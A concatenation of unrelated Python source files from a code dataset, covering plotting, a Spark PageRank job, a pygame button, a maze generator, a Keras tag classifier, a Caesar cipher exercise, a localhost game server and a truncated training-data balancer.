impresora.remover_insertando_papel()\n impresora.registrar_insertando_papel(fin_de_la_impresion)\n timeout_add(10000, fin_de_la_impresion)\n\n logger.info(\"Enviando comando de impresion.\")\n self.seleccion.serial = \\\n bytes(self.modulo.rampa.datos_tag['serial'], \"utf8\")\n respuesta = impresora.registrar(self.seleccion, solo_impimir)\n logger.info(\"Fin del registro.\")\n if respuesta['status'] == \"TAG_NO_GUARDADO\":\n logger.error(\"Recibido el mensaje de tag no guardado.\")\n fallo = True\n self.callback_error()\n else:\n fallo = True\n self.callback_error()\n\n def _prepara_impresion(self, seleccion):\n \"\"\"Guarda la seleccion en el objeto registrador.\"\"\"\n self.seleccion = seleccion\n","sub_path":"msa/modulos/sufragio/registrador.py","file_name":"registrador.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"502679022","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom constants import const\nimport h5py\nimport sys\n\n\ndef pltmap(H, pcA, pcB):\n\n C = const()\n\n fig = plt.figure(figsize=[7.5, 5])\n ax = fig.add_subplot(111)\n\n \"\"\"define the colors of interest\"\"\"\n n_col = len(C['sid'])\n clis = np.linspace(0, 1, n_col)\n colormat = cm.rainbow(clis)\n markermat = ['o', 'v', 'p',\n 's', '>', 'P',\n '*', '<', 'X',\n 'D', 'd', '^']\n sizemat = [7, 7, 7,\n 6, 7, 8,\n 11, 7, 8,\n 6, 7, 7]\n\n f_red = h5py.File(\"spatial_reduced_L%s.hdf5\" % H, 'r')\n\n \"\"\"plot SVE sets for cal\"\"\"\n\n for ii in xrange(len(C['sid'])):\n\n sid = C['sid'][ii]\n name = C['names_plt'][ii]\n\n reduced = f_red.get('reduced_%s' % sid)[...]\n meanA = reduced[:, pcA].mean()\n meanB = reduced[:, pcB].mean()\n\n plt.text(meanA, meanB+8, name,\n horizontalalignment='center',\n verticalalignment='center',\n fontsize=20,\n weight='semibold',\n color=[0.15, 0.15, 0.15],\n alpha=0.99)\n\n # mfc = np.zeros((4,))\n # mfc[:3] = 0.999*colormat[ii, :3]\n # mfc[3] = 0.2 # marker face alpha\n\n # mec = np.zeros((4,))\n # mec[:3] = 0.7*colormat[ii, :3]\n # mec[3] = 0.8 # marker edge alpha\n\n mfc = np.zeros((4,))\n mfc[:3] = colormat[ii, :3] + .3*(1-colormat[ii, :3])\n mfc[3] = 1 # marker face alpha\n\n mec = np.zeros((4,))\n mec[:3] = 0.7*colormat[ii, :3]\n mec[3] = 1 # marker edge alpha\n\n plt.plot(reduced[:, pcA], reduced[:, pcB],\n marker=markermat[ii], markersize=sizemat[ii],\n mfc=mfc, mec=mec,\n linestyle='', label=C['names_plt'][ii])\n\n # plt.plot(reduced[:, pcA], reduced[:, pcB],\n # marker='o', markersize=6, color=colormat[ii, :],\n # alpha=0.2, linestyle='')\n # plt.plot(meanA, meanB,\n # marker='D', markersize=8, color=colormat[ii, :],\n # linestyle='')\n\n # varmat = np.var(reduced, axis=0)\n # msg = \"total variance for %s: %s\" % (sid, varmat.sum())\n # rr.WP(msg, C['wrt_file'])\n\n plt.margins(.1)\n\n # plt.xlabel(\"PC%s\" % str(pcA+1))\n # plt.ylabel(\"PC%s\" % str(pcB+1))\n plt.xlabel(\"PC%s\" % str(pcA+1), fontsize='large')\n plt.ylabel(\"PC%s\" % str(pcB+1), fontsize='large')\n plt.xticks(fontsize='large')\n plt.yticks(fontsize='large')\n\n plt.grid(linestyle='-', alpha=0.15)\n\n gr = 1.00\n ax.patch.set_facecolor([gr, gr, gr])\n\n fig.tight_layout()\n\n f_red.close()\n\n fig_name = 'pc%s_pc%s_L%s.png' % (pcA+1, pcB+1, H)\n fig.canvas.set_window_title(fig_name)\n plt.savefig(fig_name)\n\n\nif __name__ == '__main__':\n H = np.int64(sys.argv[1])\n pcA = np.int64(sys.argv[2])\n pcB = np.int64(sys.argv[3])\n\n pltmap(H, pcA, pcB)\n\n plt.show()\n","sub_path":"fip_collab/2017_02_24_HCF_pearson/plot_pc_map.py","file_name":"plot_pc_map.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"448618732","text":"from distutils.core import setup, Extension\nimport numpy as np\n\nmodule1 = Extension(\n \"dmp\",\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n include_dirs=[np.get_include()],\n sources=[\"src/dmp.cpp\"],\n)\n\nsetup(\n name=\"dmp\",\n version=\"1.0\",\n description=\"dmp package\",\n ext_modules=[module1],\n)\n","sub_path":"bindings/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"142581654","text":"import sys\nimport re\nfrom pyspark.sql import SparkSession\nfrom operator import add\n\ndef computeContribs(urls, rank):\n \"\"\"Calculates URL contributions to the rank of other URLs.\"\"\"\n num_urls = len(urls)\n for url in urls:\n yield (url, rank / num_urls)\n\n\ndef parseNeighbors(urls):\n \"\"\"Parses a urls pair string into urls pair.\"\"\"\n parts = re.split(r'\\s+', urls)\n return parts[0], parts[1]\n\nspark = SparkSession\\\n\t.builder\\\n\t.appName(\"part3\")\\\n\t.config(\"spark.driver.memory\", \"8g\")\\\n\t.config(\"spark.executor.memory\", \"8g\")\\\n\t.config(\"spark.executor.cores\", \"5\")\\\n\t.config(\"spark.task.cpus\", \"1\")\\\n\t.getOrCreate()\n\ntxt = spark.read.text(sys.argv[2]).rdd.map(lambda r: r[0])\nrows = txt.filter(lambda line: line[0]!=\"#\")\n\nlinks = rows.map(lambda urls: parseNeighbors(urls)).distinct().groupByKey().partitionBy(int(sys.argv[1]))\nranks = links.map(lambda url_neighbors: (url_neighbors[0], 1.0)).partitionBy(int(sys.argv[1]))\n\nfor ite in range(10):\n\tcontributions = links.join(ranks).flatMap(\n lambda url_urls_rank: computeContribs(url_urls_rank[1][0], url_urls_rank[1][1]))\n\tranks = contributions.reduceByKey(add).mapValues(lambda rank: rank * 0.85 + 0.15)\n\nite=0\nfor (link,rank) in ranks.collect():\n\tprint(\"%s has rank: %s\" %(link,rank))\n\tite+=1\n\tif ite==5:\n\t\tbreak\n\n","sub_path":"assignment1/code/part3/task2/small_data/part3_t2_small.py","file_name":"part3_t2_small.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"189943276","text":"import pygame.font #加载和表示文本模块\n\nclass Button():\n '''按键控件'''\n def __init__(self,screen,msg): #??ai_settings self,ai_settings,screen,msg\n '''控件初始化属性'''\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n #具体尺寸等\n self.width,self.height = 459,90 #这里创建的框小了,实际文字自带底色就会超出边界\n self.button_color = (135,135,135) #灰色\n self.text_color = (255,255,255) #白色\n self.font = pygame.font.Font('font/pingfang.ttf',48) #试了几个常用字体,就苹方能正常显示中文;若pygame.font.SysFont(None,48) None默认系统字体(不支持中文),48号;\n\n #创建按钮的rect对象,并使其居中\n self.rect = pygame.Rect(0,0,self.width,self.height) #参数为左上角坐标xy,及宽高\n self.rect.center = self.screen_rect.center #屏幕内居中\n\n #按钮标签只需创建一次\n self.prep_msg(msg)\n\n def prep_msg(self,msg):\n '''将字符串 msg渲染为图像,并使其在按钮上居中'''\n #pygame.font.font.render(字符串,抗锯齿True/False,字体颜色RGB元组,<可选>背景色)\n self.msg_image = self.font.render(msg,True,self.text_color,\n self.button_color) #转化为surface\n self.msg_image_rect = self.msg_image.get_rect() #获取文字层对应的surface的rect属性\n self.msg_image_rect.center = self.rect.center #居中对齐建立的buttonrect对象\n\n def draw_button(self):\n '''绘制按钮'''\n self.screen.fill(self.button_color,self.rect) #填充设置的按钮rect\n self.screen.blit(self.msg_image,self.msg_image_rect) #在 文字层对应的surface的rect上绘制msg\n\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"214376247","text":"def reverse(num):\n rev = 0\n while (num > 0):\n rev = rev * 10 + num % 10\n num = num // 10\n\n return rev\n\n\n# Function that returns true\n# if num is palindrome\ndef isPalindrome(num):\n # If the number is equal to the\n # reverse of it then it\n # is a palindrome\n if (num == reverse(num)):\n return True\n\n return False\n\n\n# Function to prall the\n# d-digit palindrome numbers\ndef printPalindromes(d):\n if (d <= 0):\n return\n\n # Smallest and the largest d-digit numbers\n smallest = pow(10, d - 1)\n largest = pow(10, d) - 1\n\n # Starting from the smallest d-digit\n # number till the largest\n for i in range(smallest, largest + 1):\n\n # If the current number\n # is palindrome\n if (isPalindrome(i)):\n print(i, end=\" \")\n\n # Driver code\n\n\nd = 8\nprintPalindromes(d)","sub_path":"CodeChef/aug_cookoff_2nd.py","file_name":"aug_cookoff_2nd.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24570254","text":"'''\nSimple maze generator\n'''\n\nimport numpy\nfrom numpy.random import random_integers as rand\n\n\ndef maze(width=10, height=10, complexity=.75, density=.75):\n # Only odd shapes\n width = width + 1\n height = height + 1\n shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)\n # Adjust complexity and density relative to maze size\n complexity = int(complexity * (5 * (shape[0] + shape[1])))\n density = int(density * ((shape[0] // 2) * (shape[1] // 2)))\n # Build actual maze\n Z = numpy.zeros(shape, dtype=bool)\n # Fill borders\n Z[0, :] = Z[-1, :] = 1\n Z[:, 0] = Z[:, -1] = 1\n # Make aisles\n for i in range(density):\n x, y = rand(0, shape[1] // 2) * 2, rand(0, shape[0] // 2) * 2\n Z[y, x] = 1\n for j in range(complexity):\n neighbours = []\n if x > 1:\n neighbours.append((y, x - 2))\n if x < shape[1] - 2:\n neighbours.append((y, x + 2))\n if y > 1:\n neighbours.append((y - 2, x))\n if y < shape[0] - 2:\n neighbours.append((y + 2, x))\n if len(neighbours):\n y_,x_ = neighbours[rand(0, len(neighbours) - 1)]\n if Z[y_, x_] == 0:\n Z[y_, x_] = 1\n Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1\n x, y = x_, y_\n # convert to maze.py format\n ret = [[0 for x in range(len(Z[0]) - 2)] for y in range(len(Z) - 2)]\n for i in range(len(Z)):\n for j in range(len(Z[0])):\n if i > 0 and j > 0 and i < len(Z) - 1 and j < len(Z[0]) - 1:\n if Z[i][j] == 1:\n ret[i - 1][j - 1] = [0, 0, 0]\n else:\n ret[i - 1][j - 1] = [255, 255, 255]\n if i == 1 and j == 1:\n ret[i - 1][j - 1] = [0, 0, 255]\n if i == len(Z) - 2 and j == len(Z[0]) - 2:\n ret[i - 1][j - 1] = [255, 0, 0]\n return ret\n","sub_path":"HW02/kuimaze/map_generator.py","file_name":"map_generator.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"31060360","text":"import string\n#import sys\n#import inspect\n#import operator\nfrom .Transaction import Transaction\nfrom JumpScale import j\n\nclass TransactionController(object):\n '''\n Manager controlling actions\n Transactions = jumpscale transactions\n see #@todo doc on jumpscale\n @property transactions: array of transactions \n @property width: Maximum width of output\n @property maxloglevel : max loglevel which will be captured (default for all transactions)\n for more info see: http://www.jumpscale.org/display/PM/Transactions\n '''\n def __init__(self):\n self.activeTransaction=None\n self.transactions=[] #list of transactions\n self.maxloglevel=5\n self.send2console=True\n def hide(self,maxloglevel, callback, callbackparams):\n self.start(\"hide\", \"\", \"\", maxloglevel, callback, callbackparams,noOutput=True)\n\n def start(self, description, errormessage=None, resolutionmessage=None,maxloglevel=2,maxloglevelcapture=5,\\\n callback=None,callbackparams=None,silent=False):\n '''Start a new transaction and return the transaction\n\n @param description: Description of the transaction\n @param errormessage: Error message displayed to the user when the transaction fails\n @param resolutionmessage: Resolution message displayed to the user when the transaction fails\n @param maxloglevel specify which logs with max level should be remembered when doing the transaction\n @param callback can use this to provide a sort of rollback mechanism to e.g. cleanup a state\n @param callbackparams dict of parameters\n\n '''\n #j.logger.log('Starting transaction: %s' % description,5)\n if self.hasRunningTransactions()==False:\n self.originalwidth=j.console.width\n \n transaction = Transaction(description, errormessage, resolutionmessage,\\\n maxloglevel=maxloglevel,maxloglevelcapture=maxloglevelcapture,\\\n callback=callback,callbackparams=callbackparams,silent=silent)\n \n self.transactions.append(transaction)\n self.activeTransaction=transaction\n\n \n #msg=\"TRANSACTION START: %s\" % transaction.description\n msg=\"%s\" % transaction.description\n if self.send2console and silent==False:\n j.console.echoListItem(msg)\n else:\n j.logger.log(msg,5)\n if silent==False:\n j.console.indent+=1 \n\n def stop(self,failed=False):\n '''\n Stop the currently running transaction\n\n This will get the latest started transaction from the transaction stack and\n display status\n @param failed, used when error is raised by errorconditionhanlder\n '''\n if not self.transactions:\n raise RuntimeError('[ACTIONS] Stop called while no transactionsactions are '\n 'running at all')\n \n transaction = self.transactions.pop()\n #_TransactionStatus=j.enumerators.TransactionStatus\n #status = _TransactionStatus.DONE if not failed else _TransactionStatus.FAILED\n status=2\n if not failed and not self.transactions:\n #status = _TransactionStatus.FINISHED\n status=1\n if transaction.silent==False:\n j.console.indent-=1 \n #if status==_TransactionStatus.FINISHED:\n if status==1:\n msg=\"TRANSACTION %s: %s\" % (string.upper(str(status)),transaction.description)\n self.activeTransaction=None\n else:\n msg=\"TRANSACTION %s: %s\" % (string.upper(str(status)),transaction.description)\n #if self.send2console:\n #j.console.echoListItem(msg)\n #else:\n j.logger.log(msg,5)\n \n def stopall(self):\n \"\"\"\n stop all transaction\n \"\"\"\n for tr in self.transactions:\n self.stop()\n\n def clean(self):\n '''Clean the list of running actions'''\n j.logger.log('[ACTIONS] Clearing all actions', 5)\n self.transactions = 
list()\n\n\n def hasRunningTransactions(self):\n '''\n Check whether actions are currently running\n @returns: Whether actions are runnin\n '''\n return bool(self.transactions)\n\n","sub_path":"lib/JumpScale/baselib/actionsold/transaction/TransactionController.py","file_name":"TransactionController.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"455001261","text":"\n# coding: utf-8\n\n# In[3]:\n\nimport pickle\nimport numpy as np\nimport string\nimport sys\nimport h5py \nimport keras.backend as K \nfrom keras import regularizers\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout,BatchNormalization\nfrom keras.layers import GRU,LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\ntest_path = sys.argv[1]\noutput_path = sys.argv[2]\n\n#####################\n### parameter ###\n#####################\nsplit_ratio = 0.1\nembedding_dim = 100\nnb_epoch = 1000\nbatch_size = 128\n\n\n################\n### Util ###\n################\ndef read_data(path,training):\n print ('Reading data from ',path)\n with open(path,'r',encoding = 'ISO-8859-1') as f:\n \n tags = []\n articles = []\n tags_list = []\n \n f.readline()\n for line in f:\n if training :\n start = line.find('\\\"')\n end = line.find('\\\"',start+1)\n tag = line[start+1:end].split(' ')\n article = line[end+2:]\n \n for t in tag :\n if t not in tags_list:\n tags_list.append(t)\n \n tags.append(tag)\n else:\n start = line.find(',')\n article = line[start+1:]\n \n articles.append(article)\n \n if training :\n assert len(tags_list) == 38,(len(tags_list))\n assert len(tags) == len(articles)\n return (tags,articles,tags_list)\n\ndef get_embedding_dict(path):\n embedding_dict = {}\n with open(path,'r',encoding = 'utf8') as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n coefs = np.asarray(values[1:],dtype='float32')\n embedding_dict[word] = coefs\n return embedding_dict\n\ndef get_embedding_matrix(word_index,embedding_dict,num_words,embedding_dim):\n embedding_matrix = np.zeros((num_words,embedding_dim))\n for word, i in word_index.items():\n if i < num_words:\n embedding_vector = embedding_dict.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n return embedding_matrix\n\ndef to_multi_categorical(tags,tags_list): \n tags_num = len(tags)\n tags_class = len(tags_list)\n Y_data = np.zeros((tags_num,tags_class),dtype = 'float32')\n for i in range(tags_num):\n for tag in tags[i] :\n Y_data[i][tags_list.index(tag)]=1\n assert np.sum(Y_data) > 0\n return Y_data\n\ndef split_data(X,Y,split_ratio):\n indices = np.arange(X.shape[0]) \n np.random.shuffle(indices) \n \n X_data = X[indices]\n Y_data = Y[indices]\n \n num_validation_sample = int(split_ratio * X_data.shape[0] )\n \n X_train = X_data[num_validation_sample:]\n Y_train = Y_data[num_validation_sample:]\n\n X_val = X_data[:num_validation_sample]\n Y_val = Y_data[:num_validation_sample]\n\n return (X_train,Y_train),(X_val,Y_val)\n\ndef create_model(num_words,embedding_dim,embedding_matrix,max_article_length):\n model = Sequential()\n model.add(Embedding(num_words,\n embedding_dim,\n weights=[embedding_matrix],\n input_length=max_article_length,\n trainable=False))\n model.add(GRU(256,activation='tanh', \n recurrent_initializer = 'orthogonal',\n bias_initializer='ones',\n recurrent_dropout=0.1,\n dropout=0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(38,activation='sigmoid'))\n model.summary()\n return model\n\n \n###########################\n### custom metrices 
###\n###########################\ndef f1_score(y_true,y_pred):\n thresh = 0.5\n y_pred = K.cast(K.greater(y_pred,thresh),dtype='float32')\n tp = K.sum(y_true * y_pred,axis=-1)\n \n precision=tp/(K.sum(y_pred,axis=-1)+K.epsilon())\n recall=tp/(K.sum(y_true,axis=-1)+K.epsilon())\n return K.mean(2*((precision*recall)/(precision+recall+K.epsilon())))\n\n(_, X_test,_) = read_data(test_path,False)\n\nwith open('max_article_length.pkl','rb') as mal:\n max_article_length = pickle.load(mal)\nwith open('label_mapping.pkl','rb') as lm:\n tag_list = pickle.load(lm)\nwith open('word_index.pkl','rb') as wi:\n word_index = pickle.load(wi)\n\ntokenizer = Tokenizer()\n### convert word sequences to index sequence\nprint ('Convert to index sequences.')\ntokenizer.word_index = word_index\ntest_sequences = tokenizer.texts_to_sequences(X_test) \n\n### padding to equal length\nprint ('Padding sequences.')\n#train_sequences = pad_sequences(train_sequences)\n#max_article_length = train_sequences.shape[1]\ntest_sequences = pad_sequences(test_sequences,maxlen=max_article_length)\n \nprint ('Get embedding dict from glove.')\nembedding_dict = get_embedding_dict('glove.6B.%dd.txt'%embedding_dim)\nprint ('Found %s word vectors.' % len(embedding_dict))\nnum_words = len(word_index) + 1\nprint ('Create embedding matrix.')\nembedding_matrix = get_embedding_matrix(word_index,embedding_dict,num_words,embedding_dim)\n\nmodel2 = create_model(num_words,embedding_dim,embedding_matrix,max_article_length)\nmodel2.load_weights('rnn.hdf5')\nY_pred = model2.predict(test_sequences)\n \nthresh = 0.5\nwith open(output_path,'w') as output:\n print ('\\\"id\\\",\\\"tags\\\"',file=output)\n Y_pred_thresh = (Y_pred > thresh).astype('int')\n for index,labels in enumerate(Y_pred_thresh):\n labels = [tag_list[i] for i,value in enumerate(labels) if value==1 ]\n labels_original = ' '.join(labels)\n print ('\\\"%d\\\",\\\"%s\\\"'%(index,labels_original),file=output)\n\n\n# In[ ]:\n\n\n\n","sub_path":"hw5/hw5_rnn.py","file_name":"hw5_rnn.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
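The thresholded F1 above is easier to sanity-check outside the Keras graph. A NumPy restatement of the same formula (the backend ops swapped for their NumPy equivalents, epsilon hard-coded):

```python
import numpy as np

def f1_np(y_true, y_pred, thresh=0.5, eps=1e-7):
    y_pred = (y_pred > thresh).astype(float)
    tp = (y_true * y_pred).sum(axis=-1)
    precision = tp / (y_pred.sum(axis=-1) + eps)
    recall = tp / (y_true.sum(axis=-1) + eps)
    return np.mean(2 * precision * recall / (precision + recall + eps))

y_true = np.array([[1, 0, 1, 0]])
y_pred = np.array([[0.9, 0.2, 0.4, 0.1]])
print(round(float(f1_np(y_true, y_pred)), 3))  # 0.667: one of two true tags recovered
```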
+{"seq_id":"227153155","text":"#6\ndef encrypt(teks, n):\n \n listTeks = list(teks)\n\n for x in range(len(listTeks)):\n \n if(listTeks[x] != ' '):\n \n if(ord(listTeks[x]) + n < 90):\n asciiCode = ord(listTeks[x])\n dienkripsi = asciiCode + n\n listTeks[x] = chr(dienkripsi)\n\n else :\n asciiCode = ord(listTeks[x])\n dienkripsi = (asciiCode + n) - 26\n listTeks[x] = chr(dienkripsi)\n\n else : \n continue\n\n hasil = ''.join(listTeks)\n\n return hasil\n\n\ntry :\n \n teks = input('Inputkan teks yang ingin dienkripsi :')\n n = int(input('Berapa jumlah geseran enkripsi :'))\n\n hasil = encrypt(teks, n)\n print('\\nHasil enkripsi dari teks {0} yaitu : {1}'.format(teks, hasil))\n\nexcept ValueError :\n print('Inputkan khusus bilangan bulat')\n","sub_path":"6.C10.py","file_name":"6.C10.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"631396256","text":"#coding:utf-8\nimport urllib.parse\n# import urllib\na = \"中文\"\nb = urllib.parse.quote(a) #转url编码\nprint(b)\nurl = \"http://zzk.cnblogs.com/s/blogpost?Keywords=%s\"%b\nprint(url)\n\nimport requests\n# requests 自动转\nr = requests.get(\"http://zzk.cnblogs.com/s/blogpost?Keywords=%s\"%a)\nprint(r.url)\n\n# url 解码\nc = \"%E4%B8%AD%E6%96%87\"\nd = \"NGlZ7gInT8Lqg0tnETU1Pw==\"\nprint(urllib.parse.unquote(d))\nprint(urllib.parse.unquote(r.url))\n\nimport base64\nprint(base64.b64encode(d))","sub_path":"auto_python/demo7_url.py","file_name":"demo7_url.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"603782252","text":"#OK!\r\nimport socket\r\nimport threading\r\nfrom gracz import Gracz\r\nfrom gra import Gra\r\nimport json\r\n\r\n\r\nclass Server(object):\r\n GRACZE = 2 # Ilość klientów, która musi podłączyć się do serwera, aby gra rozpoczeła się\r\n\r\n def __init__(self):\r\n self.kolejka = []\r\n self.numer_gry = 0\r\n\r\n def gracz_thread(self, polaczenie, gracz):\r\n \r\n while True:\r\n try:\r\n try:\r\n dane = polaczenie.recv(1024)\r\n dane = json.loads(dane.decode())\r\n except Exception as e:\r\n break\r\n\r\n keys = [int(key) for key in dane.keys()]\r\n wyslij_informacje = {key:[] for key in keys}\r\n ostatni_gracz = None\r\n\r\n for key in keys:\r\n if key == -1:\r\n if gracz.gra:\r\n wyslij = {gracz.get_nazwa():gracz.get_wynik() for gracz in gracz.gra.gracze}\r\n wyslij_informacje[-1] = wyslij\r\n else:\r\n wyslij_informacje[-1] = []\r\n\r\n if gracz.gra:\r\n if key == 0:\r\n poprawna_odpowiedz = gracz.gra.proba_zgadniecia(gracz, dane['0'][0])\r\n wyslij_informacje[0] = poprawna_odpowiedz\r\n elif key == 1:\r\n pomin_runde = gracz.gra.pomin(gracz)\r\n wyslij_informacje[1] = pomin_runde\r\n elif key == 2:\r\n chat_tablica = gracz.gra.runda.chat.get_chat()\r\n wyslij_informacje[2] = chat_tablica\r\n elif key == 3:\r\n tablica = gracz.gra.tablica.get_tablica()\r\n if ostatni_gracz != tablica:\r\n ostatni_gracz = tablica\r\n wyslij_informacje[3] = tablica\r\n\r\n elif key == 4:\r\n wyniki = gracz.gra.get_wyniki_gracza()\r\n wyslij_informacje[4] = wyniki\r\n #######################################\r\n # Obsługa klucza 5\r\n\r\n elif key == 5:\r\n runda = gracz.gra.liczba_rund - 1\r\n wyslij_informacje[5] = runda\r\n\r\n #######################################\r\n elif key == 6:\r\n haslo = gracz.gra.runda.haslo\r\n wyslij_informacje[6] = haslo\r\n elif key == 7:\r\n liczba_pominiec = gracz.gra.runda.liczba_pominiec\r\n wyslij_informacje[7] = liczba_pominiec\r\n elif key == 8:\r\n if gracz.gra.runda.rysujacy == gracz:\r\n x, y, kolor = dane['8'][:3]\r\n gracz.gra.update_tablica(x, y, kolor)\r\n elif key == 9:\r\n t = gracz.gra.runda.czas\r\n wyslij_informacje[9] = t\r\n elif key == 10:\r\n gracz.gra.tablica.czyszczenie()\r\n elif key == 11:\r\n wyslij_informacje[11] = gracz.gra.runda.rysujacy == gracz\r\n\r\n wyslij_informacje = json.dumps(wyslij_informacje)\r\n polaczenie.sendall(wyslij_informacje.encode() + \".\".encode())\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n if gracz.gra:\r\n gracz.gra.rozlaczony_gracz(gracz)\r\n\r\n if gracz in self.kolejka:\r\n self.kolejka.remove(gracz)\r\n\r\n print(F\" {gracz.nazwa} rozłączył się z serwerem\")\r\n polaczenie.close()\r\n\r\n def obsluga_kolejki(self, gracz):\r\n\r\n self.kolejka.append(gracz)\r\n\r\n if len(self.kolejka) >= self.GRACZE:\r\n gra = Gra(self.numer_gry, self.kolejka[:])\r\n\r\n for g in gra.gracze:\r\n g.zacznij_gre(gra)\r\n\r\n self.numer_gry += 1\r\n self.kolejka = []\r\n print(f\"Gra {self.numer_gry - 1} rozpoczeła się\")\r\n\r\n def obsluga_polaczenia(self, polaczenie, adres):\r\n\r\n try:\r\n dane = polaczenie.recv(1024)\r\n nazwa = str(dane.decode())\r\n if not nazwa:\r\n raise Exception(\"Brak nazwy\")\r\n\r\n polaczenie.sendall(\"1\".encode())\r\n\r\n gracz = Gracz(adres, nazwa)\r\n self.obsluga_kolejki(gracz)\r\n thread = threading.Thread(target=self.gracz_thread, args=(polaczenie, gracz))\r\n thread.start()\r\n except Exception as e:\r\n print(e)\r\n polaczenie.close()\r\n\r\n def polaczenie_thread(self):\r\n server = \"127.0.0.1\"\r\n port = 8000\r\n\r\n s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n try:\r\n s.bind((server, port))\r\n except socket.error as e:\r\n str(e)\r\n\r\n s.listen(2)\r\n print(\"Czekanie na nawiązanie połączenia\")\r\n\r\n while True:\r\n polaczenie, adres = s.accept()\r\n print(\"Nawiązano nowe połączenie.\")\r\n\r\n self.obsluga_polaczenia(polaczenie, adres)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = Server()\r\n thread = threading.Thread(target=s.polaczenie_thread)\r\n thread.start()\r\n","sub_path":"Kalambury/Zadanie2/server/obsluga_serwera.py","file_name":"obsluga_serwera.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"260038176","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nj=np.complex(0,1)\n#for discrete inputs\n#x=[0,1,1,1,1]\n\n#for sin input \nb=np.arange(0,10*np.pi,0.5)\nz=5*(np.sin(b))\n#print(z)\n\na1=plt.subplot(3,1,1)\nplt.stem(b,z)\n#plt.stem(x)\n\nx=z\nxmag=[]\nxphase=[]\nN=1000\n\nw=np.linspace(-np.pi,np.pi,N)\ns=0\nfor i in range(0,N):\n\tfor k in range (0,len(x)):\n\t\t\ts=s+(x[k]*np.exp(-k*w[i]*j))\n\txmag.append(np.abs(s))\n\txphase.append(np.angle(s))\n\ts=0\nplt.subplot(3,1,2)\nplt.plot(w,xmag)\nplt.subplot(3,1,3)\nplt.plot(w,xphase)\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dtft.py","file_name":"dtft.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"375706451","text":"import numpy as np\r\nimport pandas as pd\r\nimport os\r\nfrom collections import Counter\r\nfrom random import shuffle\r\n\r\nos.chdir(r'H:/python/gtav/training data new')\r\n\r\nfiles = []\r\n\r\na = []\r\nw = []\r\ns = []\r\nd = []\r\nwa = []\r\nwd = []\r\nsa = []\r\nsd = []\r\nnok = []\r\n\r\ntotal = 0\r\n#{'A': 10141, 'W': 139798, 'S': 2102, 'D': 10155,\r\n#'WA': 91927, 'WD': 90380, 'SA': 1826, 'SD': 2904, 'None': 11253}\r\nfor file in os.listdir('.'):\r\n\r\n datas = np.load(file, allow_pickle=True)\r\n \r\n total += len(datas)\r\n for data in datas:\r\n img = data[0]\r\n control = data[1]\r\n\r\n if control == [1, 0, 0, 0, 0, 0, 0, 0, 0]:\r\n for i in range(5): a.append([img, control])\r\n elif control == [0, 1, 0, 0, 0, 0, 0, 0, 0]:\r\n w.append([img, control])\r\n elif control == [0, 0, 1, 0, 0, 0, 0, 0, 0]:\r\n for i in range(25): s.append([img, control])\r\n elif control == [0, 0, 0, 1, 0, 0, 0, 0, 0]:\r\n for i in range(6): d.append([img, control])\r\n elif control == [0, 0, 0, 0, 1, 0, 0, 0, 0]:\r\n wa.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 1, 0, 0, 0]:\r\n wd.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 1, 0, 0]:\r\n for i in range(25): sa.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 0, 1, 0]:\r\n for i in range(25): sd.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 0, 0, 1]:\r\n for i in range(6): nok.append([img, control]) \r\n\r\nminLen = 